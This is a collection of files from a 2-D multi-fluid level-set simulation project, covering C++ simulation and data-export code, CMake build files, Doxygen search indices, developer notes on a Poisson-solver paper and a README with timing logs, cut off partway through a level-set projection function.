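The per-node correction inside `correct_levelset` reduces to `phi_p = sign * (radius - |x - x_p|)` followed by a min/max merge. A 1-D, self-contained sketch of that step with made-up numbers (not repository code):

```cpp
// 1-D sketch of the escaped-particle correction in correct_levelset().
// An "escaped" interior particle (starting_phi < 0 but local phi > 0)
// rebuilds phi_p = sign * (radius - |x - x_p|) at nearby grid nodes, and
// phi- keeps the minimum. All numbers are assumed examples.
#include <algorithm>
#include <cmath>
#include <cstdio>

int main() {
  const float particle_x = 0.520f; // escaped particle centre
  const float radius = 0.004f;     // particle radius
  const float sign = -1.f;         // sign of its starting_phi (interior)

  const float node_x = 0.521f;     // a grid node the particle overlaps
  float phi_minus = 0.002f;        // current (wrong) phi at that node

  float phi_p = sign * (radius - std::fabs(node_x - particle_x));
  phi_minus = std::min(phi_minus, phi_p); // interior particles tighten phi-

  // Prints phi_p = -0.003: the node is pulled back inside the fluid.
  std::printf("phi_p = %f, corrected phi = %f\n", phi_p, phi_minus);
  return 0;
}
```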
{
"alpha_fraction": 0.5454545617103577,
"alphanum_fraction": 0.738095223903656,
"avg_line_length": 65,
"blob_id": "c8a84c1fe44e15cc64a6e923b549db5bed630f28",
"content_id": "bae4f06592828830c8ceb39d045ba78b454d9ed1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 462,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 7,
"path": "/docs/search/functions_6.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['sample_5fdensity',['sample_density',['../classSimulation.html#aa8c0d91b0d040b6663d4a452688e931c',1,'Simulation']]],\n ['set',['set',['../structArray2.html#ad264d90ac5d4de34e9bbc214810e169a',1,'Array2']]],\n ['snapped_5faccess',['snapped_access',['../structArray2.html#a325c7d62e750ae57f8aed0500b4fbfa1',1,'Array2']]],\n ['solve_5fpressure',['solve_pressure',['../classSimulation.html#a12f7b360ce5d22c5e8a8d111acd1c884',1,'Simulation']]]\n];\n"
},
{
"alpha_fraction": 0.686843752861023,
"alphanum_fraction": 0.6998146772384644,
"avg_line_length": 35,
"blob_id": "fad5a75724193ed3be509868e5f30673a48e9493",
"content_id": "b0f91bc43cb667059f8a7a29c37235ac32864d5d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 1621,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 45,
"path": "/lib/notes.txt",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "todo initialize walls\n\n--- BUGS\nij.x is NaN in snapped access???\n\n--- data design\nFILE STRUCTURE\n data is stored in the plot/data/ directory\n one instance of a simulation produces the following datafiles:\n - phi.dat, which includes phi values and fluid types\n - velocity.dat, which includes an interpolated velocity at voxel centers\n - particles.dat, which includes marker particles used in the particle level set method\nDATA STRUCTURE\n - phi.dat\n #x y id phi\n 0.05 0.05 0 -0.23\n ... ... ... ...\n\n\n\npoint in space -> grid coordinates for different types\n^ drafted out on paper\n\nor potentially universal grid that index\n\n~~~ A Boundary Condition Capturing Method for Poisson's Equation on Irregular Domains\nsome facts:\n - the whole computation domain is solved in one step:\n \"For eah grid point i, one can write a linear equation of the form...\n and assemble the system of linear equations into matrix form. Each\n Bk+1/2 is evaluated based on the side of the interfae that xk and xk+1 lie on. If xk\n and xk+1 lie on opposite sides of the interfae, then \fBk+1/2 is defi\fned along\n the lines of equation 48 and equation 33.\"\n\n - the coefficient matrix is unchanged\n \"Furthermore,\n the oeÆient matrix of the assoiated linear system is the standard symmetri matrix for the variable oeÆient Poisson equation in the absene of\n interfaes allowing for straightforward appliation of standard \\blak box\"\n solvers.\"\n\nQUESTION:\n does it require only 1 grid for velocity, pressure, etc?\n pretty sure (?)"
},
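The `Bk+1/2` quoted in those notes is what `Simulation::sample_density` computes: a theta-weighted harmonic average of `beta = 1/rho` across the interface (eqn. 55 in Liu et al.). A standalone numeric sketch of that formula, with illustrative values only:

```cpp
// Numeric sketch of the interface averaging implemented by sample_density():
// beta_hat = (b- * b+) / (theta * b+ + (1 - theta) * b-), where
// theta = |phi_ij| / (|phi_ij| + |phi_kl|). All numbers are assumed.
#include <cmath>
#include <cstdio>

int main() {
  const float rho_minus = 1000.f, rho_plus = 1.f; // e.g. water / air
  const float phi_ij = -0.3f, phi_kl = 0.7f;      // phi on either side

  float b_minus = 1.f / rho_minus, b_plus = 1.f / rho_plus;
  float theta = std::fabs(phi_ij) / (std::fabs(phi_ij) + std::fabs(phi_kl));
  float b_hat =
      (b_minus * b_plus) / (theta * b_plus + (1.f - theta) * b_minus);

  // b_hat always lands between the two one-sided values.
  std::printf("b_hat = %g (between %g and %g)\n", b_hat, b_minus, b_plus);
  return 0;
}
```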
{
"alpha_fraction": 0.5697503685951233,
"alphanum_fraction": 0.7518355250358582,
"avg_line_length": 96.28571319580078,
"blob_id": "5c079445d469ff3df66cb54dd0a868d2e5df5540",
"content_id": "1390fb7c64eef42264a409eb8201fa2c50970adc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 681,
"license_type": "no_license",
"max_line_length": 244,
"num_lines": 7,
"path": "/docs/search/functions_0.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['add_5ffluid',['add_fluid',['../classSimulation.html#a1aa01e35508d7a15739eb16e15ab5e00',1,'Simulation']]],\n ['apply_5fpressure_5fgradient',['apply_pressure_gradient',['../classSimulation.html#a2393e1da56190503c9e8320b8a94368c',1,'Simulation']]],\n ['array2',['Array2',['../structArray2.html#a42645581bcf87a47ecf3263388809112',1,'Array2::Array2()'],['../structArray2.html#ab4f4080a8318cfa7c953ae1ffb560daa',1,'Array2::Array2(int sx_, int sy_, float offset_x_, float offset_y_, float h_)']]],\n ['assemble_5fpoisson_5fcoefficient_5fmatrix',['assemble_poisson_coefficient_matrix',['../classSimulation.html#aad703d643ef271ce842f2b27e7a1b5fc',1,'Simulation']]]\n];\n"
},
{
"alpha_fraction": 0.6394557952880859,
"alphanum_fraction": 0.6734693646430969,
"avg_line_length": 20.14285659790039,
"blob_id": "410d551801ffc5e48529e5b527f46f841089e109",
"content_id": "8418b912b95ad42267846b1bad2fa532f1da2c80",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 147,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 7,
"path": "/test/test_calculus.cpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#include \"gtest/gtest.h\"\n\n#include \"calculus.hpp\"\n\nTEST(FirstParam, rk4) { EXPECT_EQ(1, 1); }\n\nTEST(FirstParam, forward_euler) { EXPECT_EQ(1, 1); }"
},
{
"alpha_fraction": 0.5877862572669983,
"alphanum_fraction": 0.7251908183097839,
"avg_line_length": 31.75,
"blob_id": "d4b00abc597fbef37245220706bcc4f82f0b80a1",
"content_id": "8683a3f58d9966ec2fcbfe60cf88700aecf65888",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 131,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 4,
"path": "/docs/search/all_a.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['worldspace_5fof',['worldspace_of',['../structArray2.html#afded5f53e6245dc3dbbc4e371eca7bc7',1,'Array2']]]\n];\n"
},
{
"alpha_fraction": 0.5833333134651184,
"alphanum_fraction": 0.6354166865348816,
"avg_line_length": 23,
"blob_id": "87ef63e858d6e968625ce994e3692f9490c60d0f",
"content_id": "5e9415a55f9af74369ced9d83f88d4de46aa4cd5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 96,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 4,
"path": "/docs/search/classes_2.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['iterator',['iterator',['../classArray2_1_1iterator.html',1,'Array2']]]\n];\n"
},
{
"alpha_fraction": 0.5668125152587891,
"alphanum_fraction": 0.5715247392654419,
"avg_line_length": 33.160919189453125,
"blob_id": "c311269efee24da6801837726675694624803ee8",
"content_id": "9d2850320eb1f8bf386bb469c0fe38d7b0c288ba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2971,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 87,
"path": "/lib/export_data.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#include \"fluid.hpp\"\n#include \"simulation.hpp\"\n#include <fstream>\n#include <iostream>\n#include <vector>\n\nvoid export_particles(std::vector<Fluid> &sim, float time, int frame_number) {\n std::fstream part_file(\"plot/data/part.txt\", part_file.out | part_file.app);\n part_file << \"#BLOCK HEADER time:\" << time << \"\\n\";\n part_file << \"#x\\ty\\tinitial_phi\\tradius\\n\";\n part_file << \"\\n\";\n\n for (auto &f : sim) {\n for (auto &p : f.particles) {\n part_file << p.position.x << \"\\t\" << p.position.y << \"\\t\"\n << p.starting_phi << \"\\t\" << p.radius << \"\\n\";\n }\n }\n part_file.close();\n}\n\n/* exports velocities sampled at the voxel centers */\nvoid export_velocity(VelocityField &vel, Array2f phi, float time,\n int frame_number) {\n std::fstream vel_file(\"plot/data/vel.txt\", vel_file.out | vel_file.app);\n\n vel_file << \"#BLOCK HEADER time:\" << time << \"\\n\";\n vel_file << \"#x\\ty\\tu\\tv\\n\";\n vel_file << \"\\n\";\n\n for (auto it = phi.begin(); it != phi.end(); it++) {\n vec2 wp = it.wp();\n vec2 velocity = vel(wp);\n vel_file << wp.x << \"\\t\" << wp.y << \"\\t\" << velocity.x << \"\\t\" << velocity.y\n << \"\\n\";\n }\n}\n\n/** we make use of the fact that by our projection method, only one fluid at any\n * point has a negative phi value. so if we only include negative phi values, we\n * are guaranteed both no overlaps (because at most 1 is negative) and no gaps\n * (because we will never have no gaps).\n * */\nvoid export_fluid_ids(Array2f &p, std::vector<Fluid> &fluids, float time,\n int frame_number) {\n std::fstream fluid_id_file(\"plot/data/phi.txt\",\n fluid_id_file.out | fluid_id_file.app);\n\n fluid_id_file << \"#BLOCK HEADER time:\" << time << \"\\n\";\n fluid_id_file << \"#x\\ty\\tphi\\tid\\tpressure\\n\";\n fluid_id_file << \"\\n\";\n\n for (int n = 0; n < (int)fluids.size(); n++) {\n auto &f = fluids[n];\n for (auto it = f.phi.begin(); it != f.phi.end(); it++) {\n if (*it > 0)\n continue;\n vec2 ij = it.ij();\n vec2 wp = f.phi.worldspace_of(ij);\n fluid_id_file << wp.x << \"\\t\" << wp.y << \"\\t\" << *it << \"\\t\" << n << \"\\t\"\n << p(ij) << \"\\n\";\n }\n }\n fluid_id_file.close();\n}\n\nvoid export_simulation_data(Array2f &p, VelocityField vel,\n std::vector<Fluid> &sim, float time,\n int frame_number) {\n std::printf(\"exporting frame %i at time %.2f\\n\", frame_number, time);\n export_fluid_ids(p, sim, time, frame_number);\n export_velocity(vel, sim[0].phi, time, frame_number);\n // export_particles(sim, time, frame_number);\n // TODO either remove this or make it take less storage (literally 91gb)\n}\n\nvoid clear_exported_data() {\n std::ofstream phi_file;\n phi_file.open(\"plot/data/phi.txt\");\n phi_file << \"# BEGIN PHI DATASET\\n\";\n phi_file.close();\n\n std::ofstream vel_file;\n phi_file.open(\"plot/data/vel.txt\");\n phi_file << \"# BEGIN VELOCITY DATASET\\n\";\n phi_file.close();\n}"
},
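A reader for this appended block format can stay very small. The following is a self-contained sketch (not part of the repository); it assumes the `plot/data/phi.txt` layout exactly as `export_fluid_ids` writes it — a `#BLOCK HEADER time:<t>` line, a commented column header, a blank separator, then tab-separated rows:

```cpp
// Sketch of parsing the block format produced by export_fluid_ids().
// Rows are "x y phi id pressure", tab-separated; '#' lines are headers.
#include <fstream>
#include <iostream>
#include <sstream>
#include <string>

int main() {
  std::ifstream in("plot/data/phi.txt");
  std::string line;
  float time = 0.f;
  while (std::getline(in, line)) {
    if (line.rfind("#BLOCK HEADER time:", 0) == 0) {
      // A new frame begins; remember its timestamp.
      time = std::stof(line.substr(line.find(':') + 1));
      continue;
    }
    if (line.empty() || line[0] == '#')
      continue; // skip column headers and blank separators
    std::istringstream row(line);
    float x, y, phi, pressure;
    int id;
    if (row >> x >> y >> phi >> id >> pressure)
      std::cout << "t=" << time << " fluid " << id << " phi=" << phi << "\n";
  }
  return 0;
}
```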
{
"alpha_fraction": 0.6866952776908875,
"alphanum_fraction": 0.7038626670837402,
"avg_line_length": 30.066667556762695,
"blob_id": "b633f4dcc867504856aa412da0395ba51232a184",
"content_id": "2d608cde9feff42417af42ab221074753d836c71",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 466,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 15,
"path": "/lib/CMakeLists.txt",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "include_directories(${CMAKE_CURRENT_LIST_DIR})\ninclude_directories(${PROJECT_ROOT}/thirdparty/nlohmann_json)\n\nset(lib_src ${CMAKE_CURRENT_LIST_DIR})\naux_source_directory(${CMAKE_CURRENT_LIST_DIR} lib_src)\nadd_library(${PROJECT_NAME}lib STATIC ${lib_src})\n\nfind_package(GLM 0.9.5 REQUIRED)\ninclude_directories(SYSTEM ${GLM_INCLUDE_DIRS})\n\nfind_package(Eigen3\n 3.3.0\n REQUIRED\n NO_MODULE)\ninclude_directories(${EIGEN3_INCLUDE_DIR})\n"
},
{
"alpha_fraction": 0.5344827771186829,
"alphanum_fraction": 0.7068965435028076,
"avg_line_length": 28,
"blob_id": "6dd34c5203d1b92f10d7566887d8c01225bef3eb",
"content_id": "8159cb41bea670d4895211608b5b2a84f4432fa6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 116,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 4,
"path": "/docs/search/functions_5.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['run',['run',['../classSimulation.html#ae5c367f87c0b5dc9740bc6d00e44e72c',1,'Simulation']]]\n];\n"
},
{
"alpha_fraction": 0.6466542482376099,
"alphanum_fraction": 0.714684009552002,
"avg_line_length": 36.36805725097656,
"blob_id": "36c56cf5244b2a45728bdd074c4f2928bb0444a4",
"content_id": "c1c7a457ed10d4f90b4bbf9e85f0b6ca234d6978",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 5380,
"license_type": "no_license",
"max_line_length": 353,
"num_lines": 144,
"path": "/README.md",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "[](https://travis-ci.com/bpatmiller/gfm2d)\n[](https://codecov.io/gh/bpatmiller/gfm2d)\n\n### about\nPlease read [this paper describing the project](writeup.pdf). The majority of the information comes from the original Particle Level Set Method paper, Level Set Methods and Dynamic Implicit Surfaces by Fedkiw and Osher, Multiple Interacting Fluids by Losasso et al, Stable Fluids by Stam et al, and various university pdfs scattered across the internet.\n\nThe name of this program comes from the Ghost Fluid Method, which is not used in this program.\n\n### BIG TODOS:\n* [ ] optimization - measure timings for different simulation components\n* [ ] do some documentation (? maybe idk if anyone will read the code)\n* [ ] fix cmake like a real human\n* [ ] move draw.py and movie.py to src/, also substantially refactor and consolidate (common.py) both of them.\n* [ ] cleaner, more portable format - config and data. consider the config file determining filename\n* [ ] more examples (!) (like stored in file)\n* [ ] do more test / fix catch2\n\n...\n\n* [x] get coverage working\n* [x] set up auto code review\n* [x] get travis build working\n* [x] get catch2 working\n* [x] set up array2\n* [x] make skeleton data structures\n* [x] level set initialization\n* [x] fix weird cyclic dependency\n* [x] do some simple graphics\n* [x] do level set work\n* [x] phi projection method\n* [x] levelset reinitialization\n* [x] density sampling\n* [x] poisson coefficient matrix\n* [x] poisson rhs\n* [x] pressure projection!!!\n* [x] make levelset initialization better\n* [x] impliment reactions (or something else cool)\n\n\n### data format for graphing\nwithin the plot/ folder, there are seperate files for:\n- pressure\n- velocities\n- phi/fluid id pairs\n- (maybe) particles for each fluid\n \nthe format for pressure is:\n\nx position, y position, pressure\n\nthe format for velocities are:\n\nx position, y position, x velocity, y velocity\n\nthe format for phi/fluid id pairs is:\n\nx position, y position, phi, fluid id\n\n>Note: these phi values will always be negative\n\nThe locus of each fluid will be drawn with solid cells, where the hue will be chosen according to which fluid exists at the center of the cell, and the intensity will be chosen based on the value of phi.\nVelocity will be drawn on top of the cell centers as an arrow pointing along its interpolated velocity.\n\n### config.json\n\nto add fluids, we use the \"fluid\" entry type in the json. A fluid entry consists of a name,\na density, and a phi definition. 
As of now, the only supported phi computation is of a circle\n(exterior and interior).\n\n### Dependencies\nnlohmann/json\ncatch2\nEigen3\nGLM\n\n### me learning that O3 is very good\ndebug:\n\n[ 0.852 seconds have passed ] exporting frame 0 at time 0.000000\n[ 1.420 seconds have passed ] exporting frame 1 at time 0.250000\n[ 9.732 seconds have passed ] exporting frame 2 at time 0.500000\n[ 25.893 seconds have passed ] exporting frame 3 at time 0.750000\n[ 48.799 seconds have passed ] exporting frame 4 at time 1.000000\n=======================================================================\n\nrelease:\n\n[ 0.033 seconds have passed ] exporting frame 0 at time 0.000000\n[ 0.085 seconds have passed ] exporting frame 1 at time 0.250000\n[ 0.377 seconds have passed ] exporting frame 2 at time 0.500000\n[ 0.936 seconds have passed ] exporting frame 3 at time 0.750000\n[ 1.690 seconds have passed ] exporting frame 4 at time 1.000000\n===============================================================================\n\n# performance benefits of solving with an initial guess\nwith guess:\n\n[ 0.00s elapsed ] exporting frame 0 at time 0.00\n[ 0.02s elapsed ] exporting frame 1 at time 1.00\n[ 19.56s elapsed ] exporting frame 2 at time 2.00\n[ 44.51s elapsed ] exporting frame 3 at time 3.00\n[ 78.75s elapsed ] exporting frame 4 at time 4.00\n\nwithout guess:\n\nTODO finish this\n\n\nTESTING LEVELSET REINITIALIZATION\nconfig1:\n- steps = 50, tol = 1e-1f, dt = 0.5f * h\n\n[ 0.03s elapsed ] exporting frame 0 at time 0.00\n[ 0.12s elapsed ] exporting frame 1 at time 0.50\n[ 1.33s elapsed ] exporting frame 2 at time 1.00\n[ 3.82s elapsed ] exporting frame 3 at time 1.50\n[ 8.42s elapsed ] exporting frame 4 at time 2.00\n\n[ 0.03s elapsed ] exporting frame 0 at time 0.00\n[ 0.12s elapsed ] exporting frame 1 at time 0.50\n[ 1.37s elapsed ] exporting frame 2 at time 1.00\n[ 3.91s elapsed ] exporting frame 3 at time 1.50\n[ 8.73s elapsed ] exporting frame 4 at time 2.00\n\n[ 0.03s elapsed ] exporting frame 0 at time 0.00\n[ 0.12s elapsed ] exporting frame 1 at time 0.50\n[ 1.33s elapsed ] exporting frame 2 at time 1.00\n[ 3.77s elapsed ] exporting frame 3 at time 1.50\n[ 8.43s elapsed ] exporting frame 4 at time 2.00\n\n- steps = 250, tol = 1e-1f, dt = 0.5f * h\n[ 8.53s elapsed ] exporting frame 4 at time 2.00\n\n[ 0.02s elapsed ] exporting frame 0 at time 0.00\n[ 0.11s elapsed ] exporting frame 1 at time 0.50\n[ 1.34s elapsed ] exporting frame 2 at time 1.00\n[ 3.74s elapsed ] exporting frame 3 at time 1.50\n[ 8.27s elapsed ] exporting frame 4 at time 2.00\n\n[ 0.03s elapsed ] exporting frame 0 at time 0.00\n[ 0.12s elapsed ] exporting frame 1 at time 0.50\n[ 1.37s elapsed ] exporting frame 2 at time 1.00\n[ 3.93s elapsed ] exporting frame 3 at time 1.50\n[ 8.50s elapsed ] exporting frame 4 at time 2.00"
},
{
"alpha_fraction": 0.5467705726623535,
"alphanum_fraction": 0.7104676961898804,
"avg_line_length": 98.77777862548828,
"blob_id": "cb8ca782f7bea6939c7404fbb24ad5b31125ce86",
"content_id": "df2dfc00ecf2deabd51a57f6beb7c1f0c9c1241e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 898,
"license_type": "no_license",
"max_line_length": 291,
"num_lines": 9,
"path": "/docs/search/all_0.js",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "var searchData=\n[\n ['add_5ffluid',['add_fluid',['../classSimulation.html#a1aa01e35508d7a15739eb16e15ab5e00',1,'Simulation']]],\n ['apply_5fpressure_5fgradient',['apply_pressure_gradient',['../classSimulation.html#a2393e1da56190503c9e8320b8a94368c',1,'Simulation']]],\n ['array2',['Array2',['../structArray2.html',1,'Array2< T >'],['../structArray2.html#a42645581bcf87a47ecf3263388809112',1,'Array2::Array2()'],['../structArray2.html#ab4f4080a8318cfa7c953ae1ffb560daa',1,'Array2::Array2(int sx_, int sy_, float offset_x_, float offset_y_, float h_)']]],\n ['array2_3c_20float_20_3e',['Array2< float >',['../structArray2.html',1,'']]],\n ['array2_3c_20int_20_3e',['Array2< int >',['../structArray2.html',1,'']]],\n ['assemble_5fpoisson_5fcoefficient_5fmatrix',['assemble_poisson_coefficient_matrix',['../classSimulation.html#aad703d643ef271ce842f2b27e7a1b5fc',1,'Simulation']]]\n];\n"
},
{
"alpha_fraction": 0.7368420958518982,
"alphanum_fraction": 0.7428817749023438,
"avg_line_length": 27.975000381469727,
"blob_id": "c9de9bfd401712f21f0184257db4679f59f519c8",
"content_id": "06f3ddd8c84a4baddc363726e285203ed27eb779",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 1159,
"license_type": "no_license",
"max_line_length": 68,
"num_lines": 40,
"path": "/CMakeLists.txt",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "cmake_minimum_required(VERSION 3.12)\n\nset(PROJECT_NAME \"gfm\")\nset(PROJECT_ROOT ${CMAKE_CURRENT_LIST_DIR})\n\nproject(${PROJECT_NAME})\nset(CMAKE_RUNTIME_OUTPUT_DIRECTORY ${CMAKE_BINARY_DIR}/bin)\n\nset(CMAKE_CXX_STANDARD 20)\nset(CMAKE_CXX_STANDARD_REQUIRED ON)\nset(CMAKE_CXX_EXTENSIONS OFF)\n\nset(CMAKE_CXX_FLAGS \"-Wall -Wextra -Werror -Wno-unused-parameter\")\nset(CMAKE_CXX_FLAGS_DEBUG \"-g -O0\")\nset(CMAKE_CXX_FLAGS_RELEASE \"-O3\")\n\n# TODO consider changing coverage methodology?\nset(CMAKE_CXX_FLAGS_COVERAGE \"${CMAKE_CXX_FLAGS_DEBUG} --coverage\")\nset(CMAKE_EXE_LINKER_FLAGS_COVERAGE\n \"${CMAKE_EXE_LINKER_FLAGS_DEBUG} --coverage\")\nset(CMAKE_SHARED_LINKER_FLAGS_COVERAGE\n \"${CMAKE_SHARED_LINKER_FLAGS_DEBUG} --coverage\")\n\nif(DEFINED ENV{COVERAGE_OPTION})\n set(CMAKE_BUILD_TYPE COVERAGE)\n message(STATUS \"OPT building with coverage options !!\")\nelse()\n set(CMAKE_BUILD_TYPE RELEASE)\n message(STATUS \"OPT building without coverage options ~~\")\nendif()\n#\n\nset(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} \"${PROJECT_ROOT}/cmake/\")\n\nadd_subdirectory(lib)\nif(DEFINED ENV{TEST_OPTION})\n message(\"Building GTest\")\n add_subdirectory(test)\nendif()\nadd_subdirectory(src)\n"
},
{
"alpha_fraction": 0.6088844537734985,
"alphanum_fraction": 0.6255844831466675,
"avg_line_length": 29.87628936767578,
"blob_id": "caa0cf4836b883b1496bf61f579231659525e554",
"content_id": "dc9ba5c533272113bf648fd9fc62939618b301f9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2994,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 97,
"path": "/lib/simulation.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"fluid.hpp\"\n#include \"velocityfield.hpp\"\n#include <chrono>\n#include <eigen3/Eigen/SparseCore>\n#include <stdio.h>\n#include <vector>\n\n/** \\class Simulation\n * The main simulation class that defines our computational domain. It\n * is described spatially by a cell size (h) and a number of cells in both\n * dimensions (sx, sy).\n *\n * stores velocity and pressure,\n * a list of fluids contained in it,\n * a solid phi describing boundary locations\n * a map from voxels to fluid type\n */\nclass Simulation {\npublic:\n int sx = 0; // number of voxels on the x-axis\n int sy = 0; // number of voxels on the y-axis\n float h = 0; // voxel size\n\n float time_elapsed = 0; // amount of time elapsed\n float max_t = 0; // full simulation runtime\n float timestep = 0; // timestep per frame\n int frame_number = 0; // current frame\n int reseed_counter = 0; // used for PLS\n\n vec4 rxn; // 0 -> reactant1, 1->reactant2, 2->product, 3->rate\n\n Array2f u; // horizontal velocity, sampled at cell sides\n Array2f v; // vertical velocity, sampled at cell tops/bottoms\n Array2f p; // pressure, sampled at center\n VelocityField vel;\n\n std::vector<Fluid> fluids;\n Array2f solid_phi; // phi corresponding to solid boundaries, not important as\n // a SDF just to identify solids. Sampled at cell centers\n Array2i fluid_id; // describes which fluid occupies a given voxel, sampled at\n // cell centers.\n\n Simulation() {}\n Simulation(int sx_, int sy_, float h_) : sx(sx_), sy(sy_), h(h_) {}\n\n void init() {\n assert(sx != 0 && sy != 0 && h != 0);\n // face-located quantities\n u.init(sx + 1, sy, 0.0, -0.5, h);\n v.init(sx, sy + 1, -0.5, 0.0, h);\n // center-located quantities\n p.init(sx, sy, -0.5, -0.5, h);\n solid_phi.init(sx, sy, -0.5, -0.5, h);\n fluid_id.init(sx, sy, -0.5, -0.5, h);\n vel.up = &u;\n vel.vp = &v;\n }\n\n void init(int sx_, int sy_, float h_, float max_t_, float dt_) {\n sx = sx_;\n sy = sy_;\n h = h_;\n max_t = max_t_;\n timestep = dt_;\n init();\n }\n\n /** Creates a fluid of a given density, but does not equip it with a phi*/\n void add_fluid(float density) { fluids.push_back(Fluid(density, sx, sy, h)); }\n\n void print_information() {\n printf(\"~~ Simulation information ~~\\n sx: %i, sy: %i, h: %f\\n no. \"\n \"fluids: %i\\n\",\n sx, sy, h, static_cast<int>(fluids.size()));\n for (auto f : fluids) {\n f.print_information();\n }\n }\n\n void run();\n void advance(float dt);\n\n /* SIMULATION METHODS */\n float cfl();\n void add_gravity(float dt);\n void advect_velocity(float dt);\n void enforce_boundaries();\n /* Methods specifically used for solving for pressure */\n void solve_pressure(float dt);\n void apply_pressure_gradient(float dt);\n float sample_density(vec2 ij, vec2 kl);\n Eigen::SparseMatrix<double>\n assemble_poisson_coefficient_matrix(Array2i fluid_cell_count, int nf);\n Array2i count_fluid_cells();\n void get_fluid_ids();\n};"
},
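The offsets passed to `init()` above encode a staggered (MAC) layout: `u` on vertical cell faces, `v` on horizontal faces, `p` at cell centres. A standalone sketch (not repository code; the cell size is an assumed value) of where the first sample of each quantity lands, using the `world = (index - offset) * h` rule from `Array2`:

```cpp
// Standalone illustration of the staggered sampling set up in
// Simulation::init(). Offsets: u(0.0,-0.5), v(-0.5,0.0), p(-0.5,-0.5).
#include <cstdio>

// world = (index - offset) * h, as implemented by Array2::worldspace_of().
float world(float index, float offset, float h) { return (index - offset) * h; }

int main() {
  const float h = 0.1f; // assumed cell size; cell (0,0) spans [0,h] x [0,h]
  std::printf("u(0,0) -> (%.2f, %.2f)  left face\n",
              world(0, 0.0f, h), world(0, -0.5f, h));
  std::printf("v(0,0) -> (%.2f, %.2f)  bottom face\n",
              world(0, -0.5f, h), world(0, 0.0f, h));
  std::printf("p(0,0) -> (%.2f, %.2f)  cell centre\n",
              world(0, -0.5f, h), world(0, -0.5f, h));
  return 0;
}
```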
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5318265557289124,
"avg_line_length": 28.29729652404785,
"blob_id": "398c0b22b7ba60599bd58ef5f810ad8230481663",
"content_id": "bd8d57bff8d9309a3a155b5911149cb7f6564fe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4336,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 148,
"path": "/lib/levelset_methods.hpp",
"repo_name": "bpatmiller/gfm2d",
"src_encoding": "UTF-8",
"text": "#pragma once\n#include \"array2.hpp\"\n#include \"calculus.hpp\"\n#include \"fluid.hpp\"\n#include <glm/gtc/random.hpp>\n\nusing namespace glm;\n\n/** guarantees we will have no overlaps or gaps. Also checks that our fluids are\n * never defined within solid boundaries.\n *\n * currently adding reactions as an experimental feature\n * */\nvoid project_phi(std::vector<Fluid> &fluids, Array2f &solid_phi, vec4 rxn) {\n assert(!fluids.empty());\n int number_grid_points = fluids[0].phi.size();\n for (int i = 0; i < (int)number_grid_points; i++) {\n float min1 = number_grid_points;\n float min2 = number_grid_points;\n int min1_index = -1;\n int min2_index = -1;\n for (int j = 0; j < (int)fluids.size(); j++) {\n auto &f = fluids[j];\n if (f.phi(i) < min1) {\n min2 = min1;\n min2_index = min1_index;\n min1 = f.phi(i);\n min1_index = j;\n } else if (f.phi(i) < min2) {\n min2 = f.phi(i);\n min2_index = j;\n }\n }\n\n assert(min1 != number_grid_points && min2 != number_grid_points);\n assert(min1_index != -1 && min2_index != -1);\n\n bool valid_reaction = (rxn.x >= 0 && rxn.y >= 0 && rxn.z >= 0 && rxn.w > 0);\n bool desired_reactants = ((min1_index == rxn[0] && min2_index == rxn[1]) ||\n (min1_index == rxn[1] && min2_index == rxn[0]));\n bool overlap = (min1 < 0.35f * fluids[min1_index].phi.h &&\n min2 < 0.35f * fluids[min2_index].phi.h);\n if (valid_reaction && desired_reactants && overlap) {\n auto &pf = fluids[rxn[2]];\n pf.phi(i) = min1 - 1.0f * pf.phi.h;\n 